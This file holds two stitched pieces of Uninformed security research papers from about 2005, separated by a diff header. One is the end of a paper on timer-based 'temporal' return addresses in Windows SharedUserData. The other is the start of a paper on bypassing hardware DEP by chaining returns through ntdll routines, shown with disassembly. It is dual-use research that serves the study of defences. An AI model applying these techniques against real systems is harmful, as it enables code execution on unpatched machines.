00 00 00 00 ff e4 47 04
00 00 00 00 ff e4 47 05
00 00 00 00 ff e4 47 06
...
00 00 00 00 00 ff e4 00
00 00 00 00 00 ff e4 01
00 00 00 00 00 ff e4 02
Figure 5.1: 8 byte 100ns jmp esp byte combinations
Once all of the permutations have been generated, the next step is to convert
them to meaingful absolute time representations. This is accomplished by
converting all of the permutations, which represent past, future, or present
states of the temporal address, to seconds. For instance, one of the
permutations for a jmp esp instruction found within the 64-bit 100nanosecond
timer is 0x019de4ff00000000 (116500949249294300). Converting this to seconds
is accomplished by doing:
11650094924 = trunc(116500949249294300 / 10^7)
This tells us the number of seconds that will have passed when the stars align
to form this byte combination, but it does not convey the scale in which the
seconds are measured, such as whether they are based from an absolute date
(such as 1970 or 1601) or are simply acting as a timer. In this case, if the
scale were defined as being the number of seconds since 1601, the total number
of seconds could be adjusted to indicate the number of seconds that have
occurred since 1970 by subtracting the constant number of seconds between 1970
and 1601:
5621324 = 11650094924 - 11644473600
This indicates that a total of 5621324 seconds will have passed since 1970
when 0xff will be found at byte index 4 and 0xe4 will be found at byte index
5. The window of opportunity will be 7 minutes and 9 seconds after which
point the 0xff will become a 0x00, the 0xe4 will become 0xe5, and the
instruction will no longer be usable. If 5621324 is converted to a printable
date format based on the number of seconds since 1970, one can find that the
date that this particular permutation will occur at is Fri Mar 06 19:28:44 CST
1970.
While it's now been shown that is perfectly possible to predict specific times
in the past, present, and future that a given instruction or instructions can
be found within a temporal address, such an ability is not useful without
being able to predict or determine the state of the temporal address on a
target computer at a specific moment in time. For instance, while an
exploitation chronomancer knows that a jmp esp can be found on March 6th, 1970
at about 7:30 PM, it must also be known what the target machine has their
system time set to down to a granularity of mere seconds, or at least minutes.
While guessing is always an option, it is almost certainly going to be less
fruitful than making use of existing tools and services that are more than
willing to provide a would-be attacker with information about the current
system time on a target machine. Some of the approaches that can be taken to
gather this information will be discussed in the next section.
5.1) Determining System Time
There are a variety of techniques that can potentially be used to determine
the system time of a target machine with varying degrees of accuracy. The
techniques listed in this section are by no means all-encompassing but do
serve as a good base. Each technique will be elaborated on in the following
sub-sections.
5.1.1) DCERPC SrvSvc NetrRemoteTOD
One approach that can be taken to obtain very granular information about the
current system time of a target machine is to use the SrvSvc's NetrRemoteTOD
request. To transmit this request to a target machine a NULL session (or
authenticated session) must be established using the standard Session Setup
AndX SMB request. After that, a Tree Connect AndX to the IPC share should be
issued. From there, an NT Create AndX request can be issued on the named
pipe. Once the request is handled successfully the file descriptor returned
can be used for the DCERPC bind request to the SrvSvc's UUID. Finally, once
the bind request has completed successfully, a NetrRemoteTOD request can be
transacted over the named pipe using a TransactNmPipe request. The response
to this request should contain very granular information, such as day, hour,
minute, second, timezone, as well as other fields that are needed to determine
the target machine's system time. Figure shows a sample response.
This vector is very useful because it provides easy access to the complete
state of a target machine's system time which in turn can be used to calculate
the windows of time that a temporal address can be used during exploitation.
The negatives to this approach is that it requires access to the SMB ports
(either 139 or 445) which will most likely be inaccessible to an attacker.
5.1.2) ICMP Timestamps
The ICMP TIMESTAMP request (13) can be used to obtain a machine's measurement
of the number of milliseconds that have occurred since midnight UT. If an
attacker can infer or assume that a target machine's system time is set to a
specific date and timezone, it may be possible to calculate the absolute
system time down to a millisecond resolution. This would satisfy the timing
requirements and make it possible to make use of temporal addresses that have
a scale that is measured from an absolute time. According to the RFC, though,
if a system is unable to determine the number of milliseconds since UT then it
can use another value capable of representing time (though it must set a
high-order bit to indicate the non-standard value).
5.1.3) IP Timestamp Option
Like the ICMP TIMESTAMP request, IP also has a timestamp option (type 68) that
measures the number of milliseconds since midnight UT. This could also be used
to determine down to a millisecond resolution what the remote system's clock
is set to. Since the measurement is the same, the limitations are the same as
ICMP's TIMESTAMP request.
5.1.4) HTTP Server Date Header
In scenarios where a target machine is running an HTTP server, it may be
possible to extract the system time by simply sending an HTTP request and
checking to see if the response contains a date header or not. Figure shows
an example HTTP response that contains a date header.
5.1.5) IRC CTCP TIME
Perhaps one of the more lame approaches to obtaining a target machine's time
is by issuing a CTCP TIME request over IRC. This request is designed to
instruct the responder to reply with a readable date string that is relative
to the responder's system time. Unless spoofed, the response should be
equivalent to the system time on the remote machine.
6) Determining the Return Address
Once all the preliminary work of calculating all of the viable opcode windows
has been completed and a target machine's system time has been determined, the
final step is to select the next available window for a compatible opcode
group. For instance, if the next window for a jmp esp equivalent instruction
is Sun Sep 25 22:37:28 CDT 2005, then the byte index to the start of the jmp
esp equivalent must be determined based on the permutation that was generated.
In this case, the permutation that would have been generated (assuming a
100nanosecond period since 1601) is 0x01c5c25400000000. This means that jmp
esp equivalent is actually a push esp, ret which starts at byte index four.
If the start of the temporal address was at 0x7ffe0014, then the return
address that should be used in order to get the push esp, ret to execute would
be 0x7ffe0018. This basic approach is common to all temporal addresses of
varying capacity, period, and scale.
7) Case Study: Windows NT SharedUserData
With all the generic background information out of the way, a real world
practical use of this technique can be illustrated through an analysis of a
region of memory that happens to be found in every process on Windows NT+.
This region of memory is referred to as SharedUserData and has a backward
compatible format for all versions of NT, though new fields have been appended
over time. At present, the data structure that represents SharedUserData is
KUSERSHAREDDATA which is defined as follows on Windows XP SP2:
0:000> dt _KUSER_SHARED_DATA
+0x000 TickCountLow : Uint4B
+0x004 TickCountMultiplier : Uint4B
+0x008 InterruptTime : _KSYSTEM_TIME
+0x014 SystemTime : _KSYSTEM_TIME
+0x020 TimeZoneBias : _KSYSTEM_TIME
+0x02c ImageNumberLow : Uint2B
+0x02e ImageNumberHigh : Uint2B
+0x030 NtSystemRoot : [260] Uint2B
+0x238 MaxStackTraceDepth : Uint4B
+0x23c CryptoExponent : Uint4B
+0x240 TimeZoneId : Uint4B
+0x244 Reserved2 : [8] Uint4B
+0x264 NtProductType : _NT_PRODUCT_TYPE
+0x268 ProductTypeIsValid : UChar
+0x26c NtMajorVersion : Uint4B
+0x270 NtMinorVersion : Uint4B
+0x274 ProcessorFeatures : [64] UChar
+0x2b4 Reserved1 : Uint4B
+0x2b8 Reserved3 : Uint4B
+0x2bc TimeSlip : Uint4B
+0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
+0x2c8 SystemExpirationDate : _LARGE_INTEGER
+0x2d0 SuiteMask : Uint4B
+0x2d4 KdDebuggerEnabled : UChar
+0x2d5 NXSupportPolicy : UChar
+0x2d8 ActiveConsoleId : Uint4B
+0x2dc DismountCount : Uint4B
+0x2e0 ComPlusPackage : Uint4B
+0x2e4 LastSystemRITEventTickCount : Uint4B
+0x2e8 NumberOfPhysicalPages : Uint4B
+0x2ec SafeBootMode : UChar
+0x2f0 TraceLogging : Uint4B
+0x2f8 TestRetInstruction : Uint8B
+0x300 SystemCall : Uint4B
+0x304 SystemCallReturn : Uint4B
+0x308 SystemCallPad : [3] Uint8B
+0x320 TickCount : _KSYSTEM_TIME
+0x320 TickCountQuad : Uint8B
+0x330 Cookie : Uint4B
One of the purposes of SharedUserData is to provide processes with a global
and consistent method of obtaining certain information that may be requested
frequently, thus making it more efficient than having to incur the performance
hit of a system call. Furthermore, as of Windows XP, SharedUserData acts as
an indirect system call re-director such that the most optimized system call
instructions can be used based on the current hardware's support, such as by
using sysenter over the standard int 0x2e.
As can be seen right off the bat, SharedUserData contains a few fields that
pertain to the timing of the current system. Furthermore, if one looks
closely, it can be seen that these timer fields are actually updated
constantly as would be expected for any timer variable:
0:000> dd 0x7ffe0000 L8
7ffe0000 055d7525 0fa00000 93fd5902 00000cca
7ffe0010 00000cca a78f0b48 01c59a46 01c59a46
0:000> dd 0x7ffe0000 L8
7ffe0000 055d7558 0fa00000 9477d5d2 00000cca
7ffe0010 00000cca a808a336 01c59a46 01c59a46
0:000> dd 0x7ffe0000 L8
7ffe0000 055d7587 0fa00000 94e80a7e 00000cca
7ffe0010 00000cca a878b1bc 01c59a46 01c59a46
The three timing-related fields of most interest are TickCountLow,
InterruptTime, and SystemTime. These three fields will be explained
individually later in this chapter. Prior to that, though, it is important to
understand some of the properties of SharedUserData and why it is that it's
quite useful when it comes to temporal addresses.
7.1) The Properties of SharedUserData
There are a number of important properties of SharedUserData, some of
which make it useful in terms of temporal addresses and others that make it
somewhat infeasible depending on the exploit or hardware support. As far as
the properties that make it useful go, SharedUserData is located at a static
address, 0x7ffe0000, in every version of Windows NT+. Furthermore,
SharedUserData is mapped into every process. The reasons for this are that
NTDLL, and most likely other 3rd party applications, have been compiled and
built with the assumption that SharedUserData is located at a fixed address.
This is something many people are abusing these days when it comes to passing
code from kernel-mode to user-mode. On top of that, SharedUserData is required
to have a backward compatible data structure which means that the offsets of
all existing attributes will never shift, although new attributes may be, and
have been, appended to the end of the data structure. Lastly, there are a few
products for Windows that implement some form of ASLR. Unfortunately for these
products, SharedUserData cannot be feasibly randomized, or at least the author
is not aware of any approaches that wouldn't have severe performance impacts.
On the negative side of the house, and perhaps one of the most limiting
factors when it comes to making use of SharedUserData, is that it has a null
byte located at byte index one. Depending on the vulnerability, it may or may
not be possible to use an attribute within SharedUserData as a return address
due to NULL byte restrictions. As of XP SP2 and 2003 Server SP1,
SharedUserData is no longer marked as executable and will result in a DEP
violation (if enabled) assuming the hardware supports PAE. While this is not
very common yet, it is sure to become the norm over the course of time.
7.2) Locating Temporal Addresses
As seen previously in this document, using the telescope program on any
Windows application will result in the same two (or three) timers being
displayed:
C:\>telescope 2620
[*] Attaching to process 2620 (5 polling cycles)...
[*] Polling address space........
Temporal address locations:
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
Referring to the structure definition described at the beginning of this
chapter, it is possible for one to determine which attribute each of these
addresses is referring to. Each of these three attributes will be discussed
in detail in the following sub-sections.
7.2.1) TickCountLow
The TickCountLow attribute is used, in combination with the
TickCountMultiplier, to convey the number of milliseconds that have occurred
since system boot. To calculate the number of milliseconds since system boot,
the following equation is used:
T = shr(TickCountLow * TickCountMultiplier, 24)
This attribute is representative of a temporal address that has a counter
scale. It starts an unknown time and increments at constant intervals. The
biggest problem with this attribute are the intervals that it increases at.
It's possible that two machines in the same room with different hardware will
have different update periods for the TickCountLow attribute. This makes it
less feasible to use as a temporal address because the update period cannot be
readily predicted. On the other hand, it may be possible to determine the
current uptime of the machine through TCP timestamps or some alternative
mechanism, but without the ability to determine the update period, the
TickCountLow attribute seems unusable.
This attribute is located at 0x7ffe0000 on all versions of Windows NT+.
7.2.2) InterruptTime
This attribute is used to store a 100 nanosecond timer starting at system boot
that presumably counts the amount of time spent processing interrupts. The
attribute itself is stored as a KSYSTEMTIME structure which is defined as:
0:000> dt _KSYSTEM_TIME
+0x000 LowPart : Uint4B
+0x004 High1Time : Int4B
+0x008 High2Time : Int4B
Depending on the hardware a machine is running, the InterruptTime's period may
be exactly equal to 100 nanoseconds. However, testing has seemed to confirm
that this is not always the case. Given this, both the update period and the
scale of the InterruptTime attribute should be seen as limiting factors. This
fact makes it less useful because it has the same limitations as the
TickCountLow attribute. Specifically, without knowing when the system booted
and when the counter started, or how much time has been spent processing
interrupts, it is not possible to reliably predict when certain bytes will be
at certain offsets. Furthermore, the machine would need to have been booted
for a significant amount of time in order for some of the useful instructions
to be feasibly found within the bytes that compose the timer.
This attribute is located at 0x7ffe0008 on all versions of Windows NT+.
7.2.3) SystemTime
The SystemTime attribute is by far the most useful attribute when it comes to
its temporal address qualities. The attribute itself is a 100 nanosecond
timer that is measured from Jan. 1, 1601 which is stored as a KSYSTEMTIME
structure like the InterruptTime attribute. See the InterruptTime sub-section
for a structure definition. This means that it has an update period of 100
nanoseconds and has a scale that measures from Jan. 1, 1601. The scale is also
measured relative to the timezone that the machine is using (with the
exclusion of daylight savings time). If an attacker is able to obtain
information about the system time on a target machine, it may be possible to
make use of the SystemTime attribute as a valid temporal address for
exploitation purposes.
This attribute is located at 0x7ffe0014 on all versions of Windows NT+.
7.3) Calculating Viable Opcode Windows
After analyzing SharedUserData for temporal addresses it should become clear
that the SystemTime attribute is by far the most useful and potentially
feasible attribute due to its scale and update period. In order to
successfully leverage it in conjunction with an exploit, though, the viable
opcode windows must be calculated so that a time to strike can be selected.
This can be done prior to determining what the actual date is on a target
machine but requires that the storage capacity (size of the temporal address
in bytes), the update period, and the scale be known. In this case, the size
of the SystemTime attribute is 12 bytes, though in reality the 3rd attribute,
High2Time, is exactly the same as the second, High1Time, so all that really
matters are the the first 8 bytes. Doing the math to calculate per-byte
durations gives the results shown in figure . This indicates that it is only
worth focusing on opcode permutations that start at byte index four due to the
fact that all previous byte indexes have a duration of less than or equal to
one second. By applying the scale as being measured since Jan 1, 1601, all of
the possible permutations for the past, present, and future can be calculated
as described in chapter . The results of these calculations for the
SystemTime attribute are described in the following paragraphs.
In order to calculate the viable opcode windows it is necessary to have
identified the viable set of opcodes. In this case study a total of 320
viable opcodes were used (recall that opcode in this case can mean one or more
instruction). These viable opcodes were taken from the Metasploit Opcode
Database. After performing the necessary calculations and generating all of
the permutations, a total of 3615 viable opcode windows were found between
Jan. 1, 1970 and Dec. 23, 2037. Each viable opcode was broken down into
groupings of similar or equivalent opcodes such that it could be made easier
to visualize.
Looking closely at these figures it can bee seen that there were two large
spikes around 2002 and 2003 for the [esp + 8] => eip opcode group which
includes pop/pop/ret instructions common to SEH overwrites. Looking more
closely at these two years shows that there were two significant periods of
time during 2002 and 2003 where the stars aligned and certain exploits could
have used the SystemTime attribute as a temporal return address. Figure shows
the spikes in more detail. It's a shame that this technique was not published
about during those time frames! Never again in the lifetime of anyone who
reads this paper will there be such an occurrence.
Perhaps of more interest than past occurrences of certain opcode groups is
what will come in the future. The table in figure 7.1 shows the upcoming
viable opcode windows for 2005.
Date Opcode Group
------------------------------------------
Sun Sep 25 22:08:50 CDT 2005 eax => eip
Sun Sep 25 22:15:59 CDT 2005 ecx => eip
Sun Sep 25 22:23:09 CDT 2005 edx => eip
Sun Sep 25 22:30:18 CDT 2005 ebx => eip
Sun Sep 25 22:37:28 CDT 2005 esp => eip
Sun Sep 25 22:44:37 CDT 2005 ebp => eip
Sun Sep 25 22:51:47 CDT 2005 esi => eip
Sun Sep 25 22:58:56 CDT 2005 edi => eip
Tue Sep 27 04:41:21 CDT 2005 eax => eip
Tue Sep 27 04:48:30 CDT 2005 ecx => eip
Tue Sep 27 04:55:40 CDT 2005 edx => eip
Tue Sep 27 05:02:49 CDT 2005 ebx => eip
Tue Sep 27 05:09:59 CDT 2005 esp => eip
Tue Sep 27 05:17:08 CDT 2005 ebp => eip
Tue Sep 27 05:24:18 CDT 2005 esi => eip
Tue Sep 27 05:31:27 CDT 2005 edi => eip
Tue Sep 27 06:43:02 CDT 2005 [esp + 0x20] => eip
Fri Oct 14 14:36:48 CDT 2005 eax => eip
Sat Oct 15 21:09:19 CDT 2005 ecx => eip
Mon Oct 17 03:41:50 CDT 2005 edx => eip
Tue Oct 18 10:14:22 CDT 2005 ebx => eip
Wed Oct 19 16:46:53 CDT 2005 esp => eip
Thu Oct 20 23:19:24 CDT 2005 ebp => eip
Sat Oct 22 05:51:55 CDT 2005 esi => eip
Sun Oct 23 12:24:26 CDT 2005 edi => eip
Thu Nov 03 23:17:07 CST 2005 eax => eip
Sat Nov 05 05:49:38 CST 2005 ecx => eip
Sun Nov 06 12:22:09 CST 2005 edx => eip
Mon Nov 07 18:54:40 CST 2005 ebx => eip
Wed Nov 09 01:27:11 CST 2005 esp => eip
Thu Nov 10 07:59:42 CST 2005 ebp => eip
Fri Nov 11 14:32:14 CST 2005 esi => eip
Sat Nov 12 21:04:45 CST 2005 edi => eip
Figure 7.1: Opcode windows for Sept 2005 - Jan 2006
8) Case study: Example application
Aside from Windows' processes having SharedUserData present, it may also be
possible, depending on the application in question, to find other temporal
addresses at static locations across various operating system versions. Take
for instance the following example program that simply calls time every second
and stores it in a local variable on the stack named t:
#include <windows.h>
#include <time.h>
void main() {
unsigned long t;
while (1) {
t = time(NULL);
SleepEx(1000, TRUE);
}
}
When the telescope program is run against a running instance of this example
program, the results produced are:
C:\>telescope 3004
[*] Attaching to process 3004 (5 polling cycles)...
[*] Polling address space........
Temporal address locations:
0x0012FE24 [Size=4, Scale=Counter, Period=70 msec]
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
0x0012FE9C [Size=4, Scale=Counter, Period=1 sec]
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
Judging from the source code of the example application it would seem clear
that the address 0x0012ff7c coincides with the local variable t which is used
to store the number of seconds since 1970. Indeed, the t variable also has an
update period of one second as indicated by the telescope program. The other
finds may be either inaccurate or not useful depending on the particular
situation, but due to the fact that they were identified as counters instead
of being relative to one of the two epoch times most likely makes them
unusable.
In order to write an exploit that can leverage the temporal address t, it is
first necessary to take the steps outlined in this document with regard to
calculating the duration of each byte index and then building a list of all
the viable opcode permutations. The duration of each byte index for a four
byte timer with a one second period are shown in figure 8.1.
Byte Index Seconds (ext)
------------------------
0 1 (1 sec)
1 256 (4 mins 16 secs)
2 65536 (18 hours 12 mins 16 secs)
3 16777216 (194 days 4 hours 20 mins 16 secs)
Figure 8.1: 4 byte 1sec per-byte durations in seconds
The starting byte index for this temporal address is byte index one due to the
fact that it has the smallest feasible window of time for an exploit to be
launched (4 mins 16 secs). After identifying this starting byte index,
permutations for all the viable opcodes can be generated.
Nearly all of the viable opcode windows have a window of 4 minutes. Only a
few have a window of 18 hours. To get a better idea for what the future has
in store for a timer like this one, table 8.2 shows the upcoming viable opcode
windows for 2005.
Date Opcode Group
------------------------------------------
Fri Sep 02 01:28:00 CDT 2005 [reg] => eip
Thu Sep 08 21:18:24 CDT 2005 [reg] => eip
Fri Sep 09 15:30:40 CDT 2005 [reg] => eip
Sat Sep 10 09:42:56 CDT 2005 [reg] => eip
Sun Sep 11 03:55:12 CDT 2005 [reg] => eip
Tue Sep 13 10:32:00 CDT 2005 [reg] => eip
Wed Sep 14 04:44:16 CDT 2005 [reg] => eip
Figure 8.2: Opcode windows for Sept 2005 - Jan 2006
9) Conclusion
Temporal addresses are locations in memory that are tied to a timer of some
sort, such as a variable storing the number of seconds since 1970. Like a
clock, temporal addresses have an update period, meaning the rate at which its
contents are changed. They also have an inherent storage capacity which
limits the amount of time they can convey before being rolled back over to the
start. Finally, temporal addresses will also always have a scale associated
with them that indicates the unit of measure for the contents of a temporal
address, such as whether it's simply being used as a counter or whether it's
measuring the number of seconds since 1970. These three attributes together
can be used to predict when certain byte combinations will occur within a
temporal address.
This type of prediction is useful because it can allow an exploitation
chronomancer the ability to wait until the time is right and then strike once
predicted byte combinations occur in memory on a target machine. In
particular, the byte combinations most useful would be ones that represent
useful opcodes, or instructions, that could be used to gain control over
execution flow and allow an attacker to exploit a vulnerability. Such an
ability can give the added benefit of providing an attacker with universal
return addresses in situations where a temporal address is found at a static
location in memory across multiple operating system and application revisions.
An exploitation chronomancer is one who is capable of divining the best time
to exploit something based on the alignment of certain bytes that occur
naturally in a process' address space. By making use of the techniques
described in this document, or perhaps ones that have yet to be described or
disclosed, those who have yet to dabble in the field of chronomancy can begin
to get their feet wet. Viable opcode windows will come and go, but the
usefulness of temporal addresses will remain for eternityor at least as long
as computers as they are known today are around.
The fact of the matter is, though, that while the subject matter discussed in
this document may have an inherent value, the likelihood of it being used for
actual exploitation is slim to none due to the variance and delay between
viable opcode windows for different periods and scales of temporal addresses.
Or is it really that unlikely? Vlad902 suggested a scenario where an attacker
could compromise an NTP server and configure it to constantly return a time
that contains a useful opcode for exploitation purposes. All of the machines
that synchronize with the compromised NTP server would then eventually have a
predictable system time. While not completely fool proof considering it's not
always known how often NTP clients will synchronize (although logs could be
used), it's nonetheless an interesting approach. Regardless of feasibility,
the slave that is knowledge demands to be free, and so it shall.
Bibliography
Mesander, Rollo, and Zeuge. The Client-To-Client Protocol (CTCP).
http://www.irchelp.org/irchelp/rfc/ctcpspec.html; accessed Aug
5, 2005.
Metasploit Project. The Metasploit Opcode Database.
http://metasploit.com/users/opcode/msfopcode.cgi; accessed Aug
6, 2005.
Postel, J. RFC 792 - Internet Control Message Protocol.
http://www.ietf.org/rfc/rfc0792.txt?number=792; accessed Aug
5, 2005.

400
uninformed/2.3.txt Normal file
View File

@ -0,0 +1,400 @@
Bypassing Windows Hardware-enforced Data Execution Prevention
Oct 2, 2005
skape (mmiller@hick.org)
Skywing (Skywing@valhallalegends.com)
One of the big changes that Microsoft introduced in Windows XP Service Pack 2
and Windows 2003 Server Service Pack 1 was support for a new feature called Data
Execution Prevention (DEP). This feature was added with the intention of doing
exactly what its name implies: preventing the execution of code in
non-executable memory regions. This is particulary important when it comes to
preventing the exploitation of most software vulnerabilities because most
exploits tend to rely on storing arbitrary code in what end up being
non-executable memory regions, such as a thread stack or a process heap. There
are other documented techniques for bypassing non-executable protections, such
as returning into ZwProtectVirtualMemory or doing a chained ret2libc style
attack, but these approaches tend to be more complicated and in many cases are
more restricted due to the need to use bytes (such as NULL bytes) that would
otherwise be unusable in common situations[1].
DEP itself is capable of functioning in two modes. The first mode is referred
to as Software-enforced DEP. It provides fairly limited support for preventing
the execution of code through exploits that take advantage of Structured
Exception Handler (SEH) overwrites. Software-enforced DEP is used on
machines that are not capable of supporting true non-executable pages due to
inadequate hardware support. Software-enforced DEP is also a compile-time only
change, and as such is typically limited to system libraries and select
third-party applications that have been recompiled to take advantage of it.
Bypassing this mode of DEP has been discussed before and is not the focus of
this document.
The second mode in which DEP can operate is referred to as Hardware-enforced
DEP. This mode is a superset of software-enforced DEP and is used on hardware
that supports marking pages as non-executable. While most existing intel-based
hardware does not have this feature (due to legacy support for only marking
pages as readable or writable), newer chipsets are beginning to have true
hardware support through things like Page Address Extensions (PAE).
Hardware-enforced DEP is the most interesting of the two modes since it can be
seen as a truly mitigating factor to most common exploitation vectors. The
bypass technique described in this document is designed to be used against
this mode.
Before describing the technique, it is prudent to understand the parameters
under which it will operate. In this case, the technique is meant to provide a
way of executing code from regions of memory that would not typically be
executable when hardware-enforced DEP is in use, such as a thread stack or a
process heap. This technique can be seen as a means of eliminating DEP from the
equation when it comes to writing exploits because the commonly used approach of
executing custom code from a writable memory address can still be used.
Furthermore, this technique is meant to be as generic as possible such that it
can be used in both existing and new exploits without major modifications. With
the parameters set, the next requirement is to understand some of the new
features that compose hardware-enforced DEP.
When implementing support for DEP, Microsoft rightly realized that many existing
third-party applications might run into major compatibility issues due to
assumptions about whether or not a region of allocated memory is executable. In
order to handle this situation, Microsoft designed DEP so that it could be
configured in a few different manners. At the most general level, DEP is
designed to have a default parameter that indicates whether or not
non-executable protection is enabled only for system processes and custom
defined applications (OptIn), or whether it's enabled for everything except for
applications that are specifically exempted (OptOut). These two flags are
passed to the kernel during boot through the /NoExecute option in boot.ini.
Furthermore, two other flags can be passed as part of the NoExecute option to
indicate that DEP should be AlwaysOn or AlwaysOff. These two settings force a
flag to be set for each process that permanently enables or disables DEP. The
default setting on Windows XP SP2 is OptIn, while the default setting on Windows
2003 Server SP1 is OptOut.
Aside from the global system parameter, DEP can also be enabled or disabled on a
per-process basis. The disabling of non-executable (NX) support for a process
is determined at execution time. To support this, a new internal routine was
added to ntdll.dll called LdrpCheckNXCompatibility. This routine checks a few
different things to determine whether or not NX support should be enabled for
the process. The routine itself is called whenever a DLL is loaded in the
context of a process through LdrpRunInitializationRoutines. The first check it
performs is to see if a SafeDisc DLL is being loaded. If it is, NX support is
flagged as needing to be disabled for the process. The second check it performs
is to look in the application database for the process to see if NX support
should be disabled or enabled. Lastly, it checks to see if the DLL that is
being loaded is flagged as having an NX incompatible section (such as .aspack,
.pcle, and .sforce).
As a result of these checks, NX support is either enabled or disabled through a
new PROCESSINFOCLASS named ProcessExecuteFlags (0x22). When a call to
NtSetInformationProcess is issued with this information class, a four byte
bitmask is supplied as the buffer parameter. This bitmask is passed to
nt!MmSetExecuteOptions which performs the appropriate operation. Optionally, a
flag (MEM_EXECUTE_OPTION_PERMANENT, or 0x8) can also be specified as part of the
bitmask that indicates that future calls to the function should fail such that
the execute flags cannot be changed again. To enable NX support, the
MEM_EXECUTE_OPTION_DISABLE flag (0x1) is specified. To disable NX support, the
MEM_EXECUTE_OPTION_ENABLE flag (0x2) is specified. Depending on the state of
these per-process flags, execution of code from non-executable memory regions
will either be permitted (MEM_EXECUTE_OPTION_ENABLE) or denied
(MEM_EXECUTE_OPTION_DISABLE).
If it were in some way possible for an attacker to change the execution flags of
a process that is being exploited, then it follows that the attacker would be
able to execute code from previously non-executable memory regions. In order to
do this, though, the attacker would have to run code from regions of memory that
are already executable. As chance would have it, there happen to be useful
executable memory regions, and they exist at the same address in every process
[2].
To take advantage of this feature, an attacker must somehow cause
NtSetInformationProcess to be called with the ProcessExecuteFlags information
class. Furthermore, the ProcessInformation parameter must be set to a bitmask
that has the MEM_EXECUTE_OPTION_ENABLE bit set, but not the
MEM_EXECUTE_OPTION_DISABLE bit set. The following code illustrates a call to
this function that would disable NX support for the calling process:
ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE;
NtSetInformationProcess(
NtCurrentProcess(), // (HANDLE)-1
ProcessExecuteFlags, // 0x22
&ExecuteFlags, // ptr to 0x2
sizeof(ExecuteFlags)); // 0x4
One method of accomplishing this would be to use a ret2libc derived attack
whereby control flow is transferred into the NtSetInformationProcess function
with an attacker-controlled frame set up on the stack. In this case, the
arguments described to the right in the above code snippet would have to be set
up on the stack so that they would be interpreted correctly when
NtSetInformationProcess begins executing. The biggest drawback to this approach
is that it would require NULL bytes to be usable as part of the buffer that is
used for the overflow. Generally speaking, this will not be possible,
especially with any overflow that is caused through the use of a string
function. However, when possible, this approach can certainly be useful.
Though a direct return into NtSetInformationProcess may not be universally
feasible, another technique can be used that lends itself to being more
generally applicable. Under this approach, the attacker can take advantage of
code that already exists within ntdll for disabling NX support for a process.
By returning into a specific chunk of code, it is possible to disable NX support
just as ntdll would while still being able to transfer control back into a
user-controlled buffer. The one limitation, however, is that the attacker be
able to control the stack in a way similar to most ret2libc style attacks, but
without the need to control arguments.
The first step in this process is to cause control to be transferred to a
location in memory that performs an operation that is equivalent to a mov al,
0x1 / ret combination. Many instances of similar instructions exist (xor eax,
eax/inc eax/ret; mov eax, 1/ret; etc). One such instance can be found in the
ntdll!NtdllOkayToLockRoutine function.
ntdll!NtdllOkayToLockRoutine:
7c952080 b001 mov al,0x1
7c952082 c20400 ret 0x4
This will cause the low byte of eax to be set to one for reasons that will
become apparent in the next step. Once control is transferred to the mov
instruction, and then subsequently the ret instruction, the attacker must have
set up the stack in such a way that the ret instruction actually returns into
another segment of code inside ntdll. Specifically, it should return part of
the way into the ntdll!LdrpCheckNXCompatibility routine.
ntdll!LdrpCheckNXCompatibility+0x13:
7c91d3f8 3c01 cmp al,0x1
7c91d3fa 6a02 push 0x2
7c91d3fc 5e pop esi
7c91d3fd 0f84b72a0200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93feba)
In this block, a check is made to see if the low byte of eax is set to one.
Regardless of whether or not it is, esi is initialized to hold the value 2.
After that, a check is made to see if the zero flag is set (as would be the case
if the low byte of eax is 1). Since this code will be executed after the first
mov al, 0x1 / ret set of instructions, the ZF flag will always be set, thus
transferring control to 0x7c93feba.
ntdll!LdrpCheckNXCompatibility+0x1a:
7c93feba 8975fc mov [ebp-0x4],esi
7c93febd e941d5fdff jmp ntdll!LdrpCheckNXCompatibility+0x1d (7c91d403)
This block sets a local variable to the contents of esi, which in this case is
2. Afterwards, it transfers to control to 0x7c91d403.
ntdll!LdrpCheckNXCompatibility+0x1d:
7c91d403 837dfc00 cmp dword ptr [ebp-0x4],0x0
7c91d407 0f8560890100 jne ntdll!LdrpCheckNXCompatibility+0x4d (7c935d6d)
This block, in turn, compares the local variable that was just initialized to 2
with 0. If it's not zero (which it won't be), control is transferred to
0x7c935d6d.
ntdll!LdrpCheckNXCompatibility+0x4d:
7c935d6d 6a04 push 0x4
7c935d6f 8d45fc lea eax,[ebp-0x4]
7c935d72 50 push eax
7c935d73 6a22 push 0x22
7c935d75 6aff push 0xff
7c935d77 e8b188fdff call ntdll!ZwSetInformationProcess (7c90e62d)
7c935d7c e9c076feff jmp ntdll!LdrpCheckNXCompatibility+0x5c (7c91d441)
It's at this point that things begin to get interesting. In this block, a call
is issued to NtSetInformationProcess with the ProcessExecuteFlags information
class. The ProcessInformation parameter pointer is passed which was previously
initialized to 2 [3]. This results in NX support being disabled for the process.
After the call completes, it transfers control to 0x7c91d441.
ntdll!LdrpCheckNXCompatibility+0x5c:
7c91d441 5e pop esi
7c91d442 c9 leave
7c91d443 c20400 ret 0x4
Finally, this block simply restores saved registers, issues a leave instruction,
and returns to the caller. In this case, the attacker will have set up the
frame in such a way that the ret instruction actually returns into a general
purpose instruction that transfers control into a controllable buffer that
contains the arbitrary code to be executed now that NX support has been
disabled.
This approach requires the knowledge of three addresses. First, the address of
the mov al, 0x1 / ret equivalent must be known. Fortunately, there are many
occurrences of this type of block, though they may not be as simplistic as the
one described in this document. Second, the address of the start of the cmp al,
0x1 block inside ntdll!LdrpCheckNXCompatibility must be known. By depending on
two addresses within ntdll, it stands to reason that an exploit can be more
portable than if one were to depend on addresses from two different DLLs.
Finally, the third address is the one that would be the one that is typically
used on targets that didn't have hardware-enforced DEP, such as a jmp esp or
equivalent instruction depending on the vulnerability in question.
Aside from specific address limitations, this approach also relies on the fact
that ebp is pointed to a valid, writable address such that the value that
indicates that NX support should be disabled can be temporarily stored. This
can be accomplished a few different ways, depending on the vulnerability, so it
is not seen as a largely limiting factor.
To test this approach, the authors modified the warftpd_165_user exploit from
the Metasploit Framework that was written by Fairuzan Roslan. This
